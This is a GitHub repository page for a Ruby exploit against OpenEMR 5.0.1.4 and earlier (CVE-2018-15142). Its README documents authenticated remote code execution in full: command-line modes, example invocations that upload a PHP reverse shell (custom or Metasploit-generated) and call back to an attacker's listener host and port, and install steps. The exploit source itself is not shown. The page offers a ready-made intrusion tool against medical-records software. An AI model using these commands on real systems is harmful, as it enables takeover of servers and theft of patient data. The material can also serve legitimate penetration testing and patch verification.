Skip to content
/ OpenEMR-RCE Public

OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

pwn.by/noraj/

License

MIT license
8 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

noraj/OpenEMR-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
exploit.rb
exploit.rb
 
 

Repository files navigation

OpenEMR RCE exploit / PoC

OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Exploit for CVE-2018-15142.

[EDB-49486] [PacketStorm] [WLB-2020080011]

Usage

$ ruby exploit.rb --help
OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Usage:
  exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
  exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
  exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
  exploit.rb -H | --help

Options:
  -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
  -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
  -u <username>, --user <username>      Username of the admin
  -p <password>, --password <password>  Password of the admin
  -m <payload>, --payload <payload>     Metasploit PHP payload
  -h <host>, --lhost <host>             Reverse shell local host
  -t <port>, --lport <port>             Reverse shell local port
  --debug                               Display arguments
  -H, --help                            Show this screen

Examples:
  exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
  exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
  exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

Modes

  • Auto: you know the target and have your listener ready, let the exploit handle the rest
  • Semit-auto: same as auto but you would like to specify another payload than the default php/reverse_php
  • Manual: you already have a custom PHP reverse shell, the exploit lets you specify it

Requirements

Example for BlackArch:

pacman -S ruby-httpclient ruby-docopt metasploit

Example using gem:

gem install httpclient docopt

Reference

This is a better re-write of EDB-ID-48515 and implementation of EDB-ID-45202 part 2:

  • using arguments (instead of hardcoded values)
  • allowing custom PHP reverse shell or auto generating one with msfconsole
  • cleaner & more customizable
  • using ruby (python2 is deprecated)

This exploit was tested with Ruby 2.7.1.

About EDB-ID-48515:

Exploit Author: Musyoka Ian
Date: 2020-05-25
Vendor Homepage: https://www.open-emr.org/
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
Version: < 5.0.1 (Patch 4)
Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69

About

OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

pwn.by/noraj/

Topics

proof-of-concept exploit poc rce openemr remote-code-execution openemr-shell-upload openemr-exploit openemr-vulnerability openemr-rce cve-2018-15142

Resources

Readme

License

MIT license
Activity

Stars

8 stars

Watchers

3 watching

Forks

0 forks
Report repository

Languages